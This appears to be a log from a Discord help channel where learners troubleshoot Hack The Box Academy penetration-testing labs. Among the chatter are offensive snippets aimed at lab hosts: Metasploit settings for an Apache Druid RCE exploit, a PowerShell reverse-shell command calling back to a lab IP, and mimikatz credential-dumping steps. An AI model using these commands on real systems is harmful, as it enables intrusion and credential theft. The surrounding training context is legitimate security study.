tedious is going to be subjective too.
I know I'm just trying to get a general consensus and see if it matches up with my viewpoint and what the different viewpoints are
i enjoyed it a lot
its a fun module ya
I found the pivoting, tunneling, and port forwarding module to be exponentially harder tho
if you're describing it as fun then it's not tedious to you
albeit shorter
I guess tedious is the wrong word
its fun material but maybe takes longer to complete
altho I have gotten through it much more quickly than previous modules
part of that is little health improvements I have been making
and that I have had a good couple months
I guess I'm just curious why I keep hearing people say it took them two months to get through the module
I can see myself taking one and a half months to get through it at the current rate but two feels like a stretch
My guess would be because they don't spend a lot of time studying
ok
well, for me its been two weeks maybe two and a half and I'm on section 12
so that translates to a little over a month for me to complete it if we assume skills assessment will take longer
and if we take the 36 sections into account
ty

is the answer for Introduction to BASH Scripting outdated?
Conditional Execution
"Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer."
There's no ssh suggestion but the answer seems to be wrong when I don't ssh or when I do. There's no suggestion to ssh or an ip to ssh into so I am under the impression I just open the pwnbox and do the question as is. I've tried multiple answers using multiple commands and even asked chatgpt and it seems to have gotten the same answers haalp. Same thing that happened to me with the Linux fund. as well
@real trout no one is gonna give you the answer. You're expected to copy/paste the given script and then modify it to create the conditional
Yes. There's no ssh option, because a target isn't required, just a bash terminal
There's enough information in the reading to get you started
I'm asking if the question is outdated or if I am doing something wrong. I can dm you the script I am running and the answer and you can just tell me if I am doing the wrong syntax. You don't have to give me the answer I just want to make sure
Well, and a text editor
Question isn't outdated
My dms aren't open atm, about to head to bed
so you know the question isn't outdated for sure cause you checked or?
Whats the question?
^
night @fathom pendant
under conditional__Q__
Because there hasn't been a significant enough change to the bash scripting language for the module to suddenly become outdated
Nope, intro to bash
I ran into similar issues in Linux fund. under the impression I am running the correct commands but not sure
Intro to bash ya
Linux fundamentals isn't outdated either
Oh lmao not sure I fry my brain on trying to pivot and password attack module
So I am catching some sun Rays
where to provide modules related machine feedback?
is there a staff or mod that's down to just see if I am running the correct syntax?
normally it's after you complete the course I believe unless you're talking about here in the cord
review isnt feedback mate
Or just someone that's done the module. You don't exclusively need staff or mods to help
Use the syntax provided in the exercise script to count the length @real trout; it's likely GPT is leading you astray
The AI hallucinations ohno
There's many making feedback today
If you believe it's errors: #1234357888114364508
Otherwise you can do /feedback
its more like an idea for making ux better for learners. should i use erratum or /*feedback?
If there's not an appropriate tag for the post in #1234357888114364508 ; then /feedback would be better
LLM output attacks?
@real trout i suggest not using AI as much as possible when learning the fundamentals
Ahhh idk not mess with AI, learn through mistake and trials
ok np 🙂 I thought you mightve been doing to LLM output attacks module
Bit time consuming but 100% worth it
Nope I'm getting fried on Pivots and Password Attacks, just started AD Enumeration and Attacks but that 1 looks more painful than the current 1s I am doing...
Doing ADs? Good luck bro
Yeah I know seems painful and still on the intro part of it hahhaha
Is it just me or is ptunnel really janky
I'm doing the pivoting module and just building this damn thing was already complicated for no reason, now I have to restart it and my ssh dynamic port forward all the time to get it to work
hii
not even sure what you're asking but here is definitely not the place to ask
check dm
Ended up using a different pivoting method than ptunnel, I keep getting:
[inf]: Packet discarded - outside receive window.
In "Attacking common applications" in the "Thick client applications" I hardly understand anything I'm doing, I'm just walking through it, how can I get to understand what I'm doing? Or are we meant to just have that walkthrough in our notes and hope that in the exam it is presented in the same way
for those who have done the Using the Metasploit Framework module - Payload section, have you gotten this error for the questions?
[*] 10.129.89.114 - Meterpreter session 2 closed.
[*] Sending stage (3045380 bytes) to 10.129.89.114
[-] Meterpreter session 3 is not valid and will be closed
[*] 10.129.89.114 - Meterpreter session 3 closed.
It doesn't mention that kerbrute is on /opt, it says jsmith.txt is
Your set payload is either not compatible or not the same as the one you set in your msfvenom
Sorry, I dont understand. Do you mean like my set RHOSTS?
Hi guys , i hope everyone is fine , I have one question from BURP
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.
okay i even find username but how can i got the flag ?
I did an Nmap scan and found that the Apache Druid 0.17.1 service is running at port
$ nmap -sC -sV -Pn 10.129.203.52
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 14:23 WIB
Nmap scan report for 10.129.203.52
Host is up (2.1s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
| 256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_ 256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
8081/tcp open http Jetty 9.4.12.v20180830
| http-title: Apache Druid
|_Requested resource was http://10.129.203.52:8081/unified-console.html
|_http-server-header: Jetty(9.4.12.v20180830)
8082/tcp open http Jetty 9.4.12.v20180830
|_http-server-header: Jetty(9.4.12.v20180830)
|_http-title: Site doesn't have a title.
8083/tcp open http Jetty 9.4.12.v20180830
|_http-title: Site doesn't have a title.
|_http-server-header: Jetty(9.4.12.v20180830)
8888/tcp open http Jetty 9.4.12.v20180830
|_http-server-header: Jetty(9.4.12.v20180830)
| http-title: Apache Druid
|_Requested resource was http://10.129.203.52:8888/unified-console.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.38 seconds
And I use this payload module (index 0):
msf6 > search apache druid
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution
Based on the options all I need to set are just:
msf6 exploit(linux/http/apache_druid_js_rce) > set RHOSTS 10.129.89.114
RHOSTS => 10.129.89.114
msf6 exploit(linux/http/apache_druid_js_rce) > set RPORT 8081
RPORT => 8081
msf6 exploit(linux/http/apache_druid_js_rce) > set LHOST xx.xx.xx.xx
LHOST => xx.xx.xx.xx
how did u send photo cuz i cant
those aren't photos. They are codes.
Use backticks three times and end it with another 3 backticks, paste your code in between it
Hope you got it, but just in case, as a note, for some of the modules you need to only use the exact syntax as shown in the section. Any deviation/googling for other ways may in fact give you an answer that HTB wont accept.
ty I'll try again tomorrow haha
No one can help with this sorry, also this is not the place so please don't spam.
phishing link
It's not a phish, that is just how instagram formats share ID in the url
i thought it was by the way the guy was spamming
Fair assumption! Especially as instagram does/did have open redirect vulns
Anybody got an idea what I did wrong here?
Probably the wrong type of payload. For example using an x64 shell payload instead of x86 or vice versa. Play around with the options and see what sticks
hmm
type's good
when running EyeWitness I receive this error
Message: Process unexpectedly closed with status 1
I believe it occurs because of an issue with selenium.
Did someone have the same issue and managed to resolve it ?
can anyone help with second question in using crackmapexec skills assess Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
is there any other way that I can do my Penetration Testing without the VM
If you are referring to the provided workstation, yes, you can use your own VM. However, you must be connected to the VPN to do the specific exercises
fixed
hey im working on the second skill assessment within the AD module, im trying to rdp into MS01 using the Admin's hash, but it says account restrictions preventing sign-in (blank password) even though i have modified the reg key
You don't have to use dehashed
I remember trying to download it and it turns it maybe its for a price so i figured i probably can solve it without it and that was the right thinking
hi, i have a problem with a question: What type of message does a client send to accept an IP address from a DHCP server? Studying the topic, the answer is DHCP Acknowledge but every time there is an error "incorrect answer"... can you help me?
any help please guys, in the module SQLMap Essentials (SQLMap Overview) and the question is What's the fastest SQLi type? but i cant seem to get the answer right. it could just be a formatting problem (normally is) but im stuck
send the question ,maybe I can help you
thanks, sent
Hi, need some assistance
Module: Network enumeration with nmap
Section: firewall evasion, hard lab
Im at the final stage, every command has worked right only the last command for nc isnt
What could i do?
specify source port (-p) with nc
I did, but its still gave me the error that address is being used, but its alright, i found a way around it and got the flag
dnsmasq is likely running
Hi, i have the Same Problem. Did you find any Solution?
❤️
thanks
thankyou
Hello, i’m on the Password Attacks module in the skill assessment section, i managed to find the first user and i can now access the DMZ with ssh, i found the username of the second user in the DMZ but not the password, i tried to pivot to File01 because i found something related to this machine but i can’t ssh or nmap to file01 or jump01 even with proxychains, can someone please help me?
ssh isn't the only connection method
how can you see ? it’s impossible for me to nmap through the proxychains, even the dmz can’t ping other machines
well for 1: proxychains and icmp don't get along too well
and for 2: nmap isn't the only tool you can use to sweep; nxc is good at checking passwords and protocols (for instance)
oh okay thanks i’ll try it i didn’t know
use discord search feature to look for posts/solutions in this channel
having issues with the lateral movement module - netexec doesnt seem to like rdp very much and it just hangs. I have tried debugging - looks like others have had the same behaviour online (github issues)
I managed to get a reverse shell by appending “Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.172 -Port 9443” However, there was no privilege escalation with this shell (I stayed as user htb-student). [Windows Privilege Escalation -> Vulnerable Services]
i get access denied for Set-ExecutionPolicy Bypass -Scope Process
Hey fellow learners. I have a question about CVE scoring for reports - I have an application with already assigned CVE and score attached to it. In the reporting should I just take over that score as a general one or should I recalculate CVE score depending on the impact of the specified usage of the vulnerability? Say there is a CVE with score 10, but judging from environment usage of that vulnerability objectively for that situation would score max 5 or 6, should I take over the original scoring or apply my own?
who can help me for a question
it should
filtered doesn't necessarily mean it's closed
it generally means packet accepted: but no response (typically because a connection may have timed out)
i just followed it as shown when i did it ¯_(ツ)_/¯
i don't recall running into issues
but as i said
filtered isn't closed
don't make assumptions without verification
ip route would show
but if you're able to reach and get that filtered state, then it's routed properly
Not the right channel but I will give my 2 cents. The CVSS score always has to be checked to suit the environment/application you are testing on. I can give you a concrete example. Let's say a certain CVE exploit requires login credentials to work, but in your case, the same application, now hosted on your target's network allows you to login without credentials.
While the CVSS score for that CVE would have either Low or High Privileges Required, in your case it would have None so you'd have to recalculate for that.
Thanks a lot for the answer. It's just that this part is completely missing in documentation module and I think it would be great to have something so critical for reporting included in it.
I experience this when there is no running RDP actually. Maybe
Confirm with nmap or any other rdp tool
its definitely running. the module is focused on rdp and i have rdp'd in with gui
i tried your advice and i tried nxc to scan important ports on file01 and jump01 manually and with a script and nothing is open, i don’t understand what i am missing, i just have 1 user on the first machine, it’s very frustrating tho i found the « hint » of the user hw******
History can be an important subject
Can you send
Nxc -v
if it would contain spoilers please take to dms ❤️
if it’s to find the user hw … i did find him 😦 but i don’t know what’s next
different internal services are available
Good morning all, I'm looking for a little help with "Skills Assessment - Web Fuzzing" > Question 2 (fuzzing extensions). I've added the subdomains found in question 1 to /etc/hosts but my answer isn't being accepted.
I did get question 1 correct so I know I found all the subdomains.
the extensions are expected in .ext1 .ext2 .ext3 format
don't forget to fuzz it as /indexFUZZ with the extension list
I did this. I only found 2 extensions though so I'm thinking I did something wrong. I did individually fuzz each of the found subdomains plus the root (:PORT/indexFUZZ)
there should be more than 2
I'm stumped then. I know I found all of the subdomains since I got question 1 correct. Then I fuzzed them all and only got 2 results 🤔
what module is this again? 'Web Fuzzing' isn't the module that this q is from
Skills Assessment - Web Fuzzing
I ran through the Page Fuzzing module and my notes again but nothing stood out.
link the module
Ah, sorry its - Attacking Web Applications with Ffuf > Skills Assessment - Web Fuzzing
https://academy.hackthebox.com/module/54/section/511
hey everyone! is it allowed to ask for a nudge for skill assessment here?
ah attacking web apps
give me a sec to see if I can spin up and get stuck give me a sec
Hi guys, I need a bit of help with the password attacks module, module/147/section/1334. I’ve been stuck for quite a while and I can’t find the domain administrator’s password. I’ve used all the keywords mentioned in the module and checked the file extensions... any help would be appreciated, please.
Jesus that "Exploiting Web Vulnerabilities in Thick-Client Applications" is such a headache, please tell me that is not in the CPTS exam

@jolly oasis i had no issues with spinning up a target and finding the right extensions. f* revealed all
i used the web-extension.txt from seclist
Dang, that's the exact same wordlist I used
But I only get 2 extensions
hey how do i upload screenshot here?
- Follow #welcome
- Dont post screenshots w/spoilers for modules above t0
Can I PM you some details? I don't want to end up posting spoilers.
uh sure, normally i wouldn't but i'm curious
Sent
@cobalt lichen please avoid spoilers
sorry did i post spoiler? but i already covered it
even if you spoilered the image, anyone can still click and view
consider anything you have to find or discover a spoiler
Oh
It's hard for me to describe my problem without showing it
what count as spoiler here? because ive seen many screenshots in the chat
Anything that you have to find or discover in a skill assessment or module content above tier 0
oh thanks, i didnt know that
I feel so dumb being stuck in the active directory lab Part 1. Just can't find where to go on the VM to get to AD to add users 😭
Hi, what I have to do when I face an unreachable target in a module ? (I tried several VPN configurations)
Do I have to report it on the website ?
what is the difference between cd .. and cd -
Looking for some help on Attacking Common Services | Attacking FTP
Ran my nmap scan, found where FTP was open. I was able to login, and found some files. Used nxc to figure out what user and password would work. For the "What username is available for FTP" question - neither the user I logged in with nor the user I found within FTP are correct? Please @ with responses
@trim pivot Please do not post content from modules above tier 0, especially skill assessments. You are revealing attack paths.
Hi! How can I ask for help without explaining what I've already tried? I feel like sharing the steps I've taken is necessary to avoid confusion and get accurate help. Is there a specific channel or user I can talk to about my progress on this module/question?
Just specify module and section you are working on and try to talk in a more neutral way as more as possible
You are on hackers server and I don't think that anybody here will walk to your link
that looks like a malicious one
<@&861185840277487616>
Very stupid guy was here
Hi everyone,
I'm working on the DACL Attacks I – Skills Assessment module and ran into an issue with the question:
"What's the content of the flag located at C:\Users\Administrator\Desktop\flag.txt?"
I’ve followed the necessary steps to escalate privileges, but I'm stuck at the point where I try to grant access over MicrosoftSync. I keep getting an error that seems related to the user or group not being found.
I’m not sure what’s causing it, and I’ve been stuck here for a while — any help or guidance would be really appreciated.
Thanks in advance!
so in simple terms cd .. takes you to the parent directory
cd - takes you to the directory you were before
so if i was in directory ~/projects and i did cd bank/data
and i run cd .. i will only go to parent dir which would be bank
but if i did cd - then i will go the directory i was before running the command which would be ~/projects
why im getting this error
I can't say I know enough, but in the error it has verifyCTL and you have verifyctl --> maybe case sensitive?
hey everyone. i just tried to use ligolo-ng for pivot and still have an error. however now if i try dig @<DC_IP> _ldap._tcp.pdc._msdcs.example.htb SRV then i get an answer from it
Further, went and brute-forced with both nxc and hydra, got nothing
when I ran nxc previously it was set on smb not ftp --> can't find anything now, I'm a bit lost and confused
Your error message says DNS resolution error
HI all I'm on PT path > Getting started > Next Step
"Now that we have finished this module, we should be ready to start working on our next steps .......Having completed one easy box as part of this module.....Choose a retired box rated Easy and root the box..."
Then it says get root on Medium box, but where is the box? Should I go to the homepage and get into Labs/Boxes?
Did you do the Knowledge Check?
Not yet
I think that's what you want
On the Knowledge check I have the same question as the Nibbles challenge I've already done
But I read the description again. "Now when you get root on easy machine, let's get root on Medium machine", something like that.. it almost wants me to look for some machines outside this module, and let's say I'm right, the only easy machine from retired boxes is "blue"
and for some reason it cost more money
Is it normal to see evidence of another user while working on a machine? I'm very new and working on artificial. I had a listener up on a port and randomly got a response from an IP I didn't recognize. I did an nmap on it and it's running through openvpn.
Hi Guys,
I'm in the same situation now and have been stuck in the middle of AEN Blind for a couple of days. I don't want to look at the walkthrough because of the spoilers but I just can't figure out what I'm missing. Feels like it's something fundamental or a gap in my methodology. I've already gone through all my notes and the course material, but I'm still stuck. Anyone willing to DM?
oh wow, you dug something up :) It's been a while for me but feel free to DM and I'll try to help, but maybe others will offer too
I've now reset the target twice, once ftp wasn't running now it is, and the brute-force for credentials failed again.... I'm extremely lost, this seems like potentially something wrong with the lab? Can someone confirm?
I'm working on Windows PrivEsc - Print Operators. The target doesn't live for very long. I am able to RDP and a few minutes later the connection is closed. ping stops working.
dms? i was having issues with it earlier too, i may be able to help
No form whatsoever even works properly on the sqlmap essentials skills assessment, I am not sure what else to look for because there are no parameters and all forms don't even function.
Keep looking and review some of the content. If you still have an issue, you can DM me
cry0l1t3@MyVPS:~$ ssh-add ~/.ssh/cry0l1t3, it's meant to be run on the host, right?
was just a bit confused when i read that in the tutorial, or it's me that didn't get it, it's in the /module/87/section/3667
Oo kk
Hey for the Windows Privilege "Miscellaneous Techniques". How long does Snaffler take? or is doing that necessary ? from my understanding im supposed to look for backup files
NVM i got it. The answer is yes Snaffler is not necessary for this one
I get nightmares when people mention snaffler
Hi everyone! I'm working on the Pivoting & Port Forwarding section "RDP and SOCKS Tunneling with SocksOverRDP"
But when I run regsvr32.exe SocksOverRDP-Plugin.dll, this happens:
Could someone give me a hand please?
is the file still there?
But... I extracted the zip file, it should be there but... that's not the case it seems
It's almost as if something big and blue is wiping things out
but where could I get that dll file?
because under SocksOverRDPx64.zip is just that server.exe
no dll file 
maybe check the hint?
but the hint is about defender (on the 172.16.6.155 I suppose)
send dm no need to clutter here 🙂
and lay out what you've tried so far in the dm ^
sure thanks!
hey which account are we supposed to find the cleartext password for in the miscellaneous techniques module in Windows Module. It says find the cleartext password for an account. I used Hashcat on all the accounts dumped and neither worked. There were only two anyways
Wish I knew! Not that far yet only in AD
Hey if anybody has done the miscellaneous techniques module in Windows Priv Escalation Module, which account is the question referring to? i have the hashes for all but none work as the answer
Does anyone know if there is a way to add time to your target system in the modules? That keeps expiring on me before the attack box. And when it expires I have to update /etc/hosts.
Anyone else cruise right through the modules, no problem, no hints, then get stuck on the Skills Assessments for 3 days? 🤣🤣
Can anyone help me on how to grab the banner with netcat
I put netcat (target) 22 but I keep getting lookup failed
@runic fog make sure the target is up, check the vpn also if running on a vm, and maybe also see if there are any flags that might help your command, always check the man pages of any tool(netcat) you use to get familiar with the tool if there is a man page available.
I reset and terminated the instance and target but nothing changes
hi it's the footprinting module and the ipmi section, i only have a hash, how can i turn it into the real password
crack it?
yes but how ?
hashcat or john?
the section you're on tells you the command to use and everything
or at least the mode
Module: Password Attacks
Section: Writing Custom Wordlists and Rules
Question: I'm required to create a custom wordlist to crack the given hash.
I tried generating multiple wordlists, but none of them works, can anyone give me a pointer on what I'm missing?
I'm pretty sure I can't craft a custom list to apply the rules on, so that's exactly where I need help.
Take a look at the table where it says " .. users use the following additions for their passwords to fit the most common password policies:" take the keywords they provide and try to make a list like what's shown in the common table.
still can't figure it out
Module: Password Attacks
Section: Cracking Protected Archives
Question: Mount the BitLocker-encrypted VHD and enter the contents of flag.txt as your answer.
when I try to configure the VHD as a loop device:
sudo losetup -f -P Private.vhd # works fine
sudo dislocker /dev/loop0 -p <password> -- /media/bitlocker # tried both -u and -p for password
sudo dislocker /dev/loop0 -u <password> -- /media/bitlocker
I get this error Wed Jul 9 23:53:19 2025 [CRITICAL] Cannot parse volume header. Abort.
I used sudo losetup -a to see the attached devices and it shows /dev/loop0 so I'm pretty sure of that
also the password is correct, but I don't know how to resolve this issue or what I'm doing wrong.
Module: Attacking Web Applications
Section: PRTG
So, I am trying to achieve command injection via the creation of a custom notification on this module. I don’t want to simply add a user and RDP to it.
That being said, I’ve tried multiple different powershell scripts, as well as base64 encoding them. I’ve also tried downloading NC.exe from an smb server hosted on my machine and then attempting for a reverse shell that way. All to no avail.
Also, I’ve tried using a multitude of different ports
I vaguely remember having trouble with mounting bitlocker as well. I’m pretty sure it had something to do with me running the attacks on my Linux vm rather than the pwnbox. But I’m not sure. All that to say, sometimes the challenges are a bit finicky in how they react to custom attack hosts.
that sucks, it should work on any setup ig
I'm on Network Enumeration with Nmap Firewall and IDS/IPS Evasion - Hard Lab. Would appreciate it if someone could tell me what service I should look for?
got the same error on Pwnbox as well
even tho sudo losetup -a shows /dev/loop0, I need to use /dev/loop0p1
so it's solved
thanks @finite bramble
What was the fix lol @barren apex
used /dev/loop0p1 instead of /dev/loop0 xD
I did that a couple of months ago. Which part are you stuck on?
Ahhh yeah. I do stuff like that all the time.
@finite bramble stuck on the last part I've scanned with nmap and found two services but neither of the service version work as an answer.
Hey guys just wanted to ask for the Setting Up module on the Information Security Foundations path, should I download and install everything listed? Because there's a lot and I'm just curious as to what I'll actually be needing to use for this path and the Pentesting path after this. Thanks for the help 🙏
Nope you don't need to do everything in that module. I think it goes over setting up a VPS etc, all optional. You can use the provided pwnbox, although if your computer has the resources I'd advise setting up a VM as the experience will be better.
I currently have a kali vm installed, but im seeing here that they recommend parrotOS for linux, do u think I should just go with that or continue with kali?
Can anyone help w this?
I'm working through Attacking Common Applications but in the last week or so the targets have been very unstable such that it's impossible to complete the labs. The targets come up for a minute or two and then they go down for a few minutes and come back up, only to go down again a couple minutes later. Currently on https://academy.hackthebox.com/module/113/section/2164 ... anything I could try on my end to fix this?
Are you using the pwnbox and vpn at the same time?
not right now, but I have done that in the past
You don't want to run the pwnbox and VPN at the same time, they share the same IP that can cause problems.
If that's not it right now, maybe try changing servers and/or regions
ahhh, good point, I forgot there were other regions, will try. Thank you so much!
fr
Hi
hello
i need some help from the author of Attacking Authentication Mechanisms . some of the content are not clear..
in OAuth Lab Setup section under Authorization Grant this is not clear "That is because the access token request and access token grant"
hey, im having an issue installing proxmox, once i click install (graphical) it just goes to a black screen.
im using a Dell Inspiron 14
i have tried various nomodeset
i tried disabling vd in bios
I'm not sure why you want to install Proxmox on a laptop.
Maybe you'd be better off asking in #homelab-sysadm
I just need a sanity check on this one. If you specify ports with -p and use --open in an nmap scan, it will only scan the ports you specify right? It's not going to return any other open ports (as in the case of this screenshot)?
I've reached out to support, but apparently the screenshot shows correct command input and output 🤔
That was my understanding too, but your screenshot shows a different response.
That's a screenshot directly from the academy page by the way. https://academy.hackthebox.com/module/113/section/1088
I'm sure it's made in error
you can use ligolo setup watch john hammond video
anyone else finding it harder to focus in the summer
Im having trouble with information gathering - web edition fingerprinting section
ask away @haughty fiber
Any one here who can help in Password attack skill assessment..
hey is there anyone stuck at skill assessment of Password attacks i got into file01 shares but i am not able to find my way forward
I think I am having the same issue. I try to reach the suggest IP and nothing happens, I just get an "unable to connect"
the vhosts are available through gobuster but cant fingerprint them or access them through browser
which part of the module
fingerprinting
Hey man, I am on the same task. Out of interest, how did you get to the page in your screen shot? was it via the command supplied http://<VM-IP>:8000/ ?
wait i might have solved it
hey have you done skill assessment of Password attacks
im setting up proxmox and its asking for a hostname (fqdn) ?
does anyone know where i can get that
in nmap scan like fully qualified domainname
anybody password attack skill assessment
nope not yet
Hey guys, working on AI Redteamer Applications of AI in Infosec Spam Classifier Model Evaluation. I am trying to find a place to upload the file for submission but http://<VM-IP>:8000/** is not working? Every time I try and reach it nothing happens, then I get an "unable to connect". I am running the lab on my own kali machine and connecting through the HTB VPN. Anyone else had any issues like this or fixed this issue? Thanks 🤷‍♂️
Can I help with pass the stack module in stuck on pass the cert section
Hi, I have a problem with the penetration tester path: a question asks for the PowerShell version, either using pwsh in bash or $PSVersionTable, and both say the version is 7.5.0, but when I try to answer with the version it says it's incorrect
What module and section?
Shells & Payloads / Anatomy of a Payload
It's working as intended, read the question again
well, thanks my bad
yeah mb
hey venom
no worries 🙂 just dont want you to get muted again by the bot
im setting up proxmox and its asking for a hostname (fqdn), does that need to be something specific?
who can i pay to get me thru this module XD
what module is this @chilly night
virtualisation
The FQDN is something the proxmox installation should be reachable on. You can always check their manual
Hi All,
I'm very, very new to Proxmox - a colleague at work recommended it to me but I have a question and he's gone campin!
Can someone please explain the Hostname (FQDN) in the management network configuration / set up please? Why do I need a domain name?
I'm really lost - do I have to go...
hey man it was still spoiler i have done that part whats your question
Attacking Common Services | Attacking FTP
Module seems to be broken - FTP won't actually open as it was yesterday, let alone the method to find login credentials isn't working as it should. Verified with someone else that I was going about it the correct way and would get the answer and flag. Just wanted to bring this up in-case moderators know how to fix etc
i got the answer its saying it is incorrect
idk why
i dont mind yess please
How to buy cubes
openvpn not connecting to vpn, anybody else?
module --> ipmi footprinting
question ---> What is the account's cleartext password?
I need to use a wordlist right ?
i tried multiple wordlists to crack it with hashcat but no success.
module link?
tried rockyou?
go to htb academy -> look at top right theres a button saying purchase cubes
heey
Need some help with Malware Analysis module, Debugging section.
I think I configured the DNS and the inetsim stuff correctly, applied all 3 patches to shell.exe, and the "Sandbox detected" message box still pops up.
Could my Kali VM (on which the inetsim is running) be not fulfilling the requests from the remote Windows machine cause it's trying to access some dangerous stuff? Genuinely have no idea.
Anyone here who can help regarding password attack skill assessment not able to find anything at file01
Which can be used to pivot forward maybe I’m doing it wrong because whatever I have found is not helping in pivoting
You're definitely able to find something. Maybe you're not understanding the output of a tool
Which tool I got access of smb share on file01
The network shares section of that module may be useful
Yes got the access of smb share found archive something there are many files bak docs got bak converted hash brute forced the password then what
Getting wrong password
Can I dm??
No
Is there anyone who has the same problem as me?
I actually did ignore it
I want to use invoke-mimikatz to dump creds from lsass automatically using ps1 file as in the image, but it occurs 1 error that seems lack of permission (sedebugprivilege) or lsa protection.
But when I do all stuff manually as exactly the same as the script do, it succeeded
Can anyone help me explain this issue please?
Do debug::privilege first then run these commands
It's privilege::debug
He could have taken a hint soo
Run mimikatz.exe then run privilege::debug and then run sekurlsa::logonpasswords
But the difference between the method to run powershell stuff …
Can’t be more straightforward than this
Can someone help me with this question please?
I know
You still need to tell mimikatz to privilege::debug
What’s the error you’re getting
You know, i’m doing all the stuff on memory
As you can see on the picture, there may be a lack of privilege or lsa protection
Idk exactly
Just guess
It is powershell -ep bypass I guess to bypass execution policy and in the mimikatz you have not used privilege::debug
Currently, it is midnight in my timezone, can i dm you later?
Thank youu so much
@worthy sorrel Excuse me, could you help me?
Hey man sorry I skipped it you have to use curl http://ip/download.php?file=filename
In the given section there maybe a file name there
Just use that one you’ll get it in your machine and then just read it you’ll get your flag
@wide hedge is it from file transfer module.?